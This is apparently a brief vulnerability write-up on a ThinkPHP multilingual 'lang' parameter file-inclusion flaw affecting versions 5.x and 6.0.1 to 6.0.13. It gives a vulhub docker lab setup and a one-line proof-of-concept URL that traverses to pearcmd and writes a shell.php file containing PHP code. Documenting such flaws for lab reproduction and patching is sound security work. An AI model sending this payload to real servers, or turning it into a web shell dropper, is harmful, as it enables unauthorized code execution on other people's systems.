Thinkphp Loadlangpack Lang Any File Contains Vulnerabilities
Thinkphp Loadlangpack Lang Any File Contains Vulnerabilities
ThinkPHP LoadLangPack lang Any file contains vulnerabilities
Vulnerability Description
When the Thinkphp program enables multilingual functions, you can pass parameters through get, header, cookie and other locations, use the pearcmd file to enter the command execution and obtain server permissions
Vulnerability Impact
Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x
Environment construction
docker pull vulhub/thinkphp:6.0.12
Vulnerability reappears
Main page
Verify POC
1
/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php
This post is licensed under CC BY 4.0 by the author.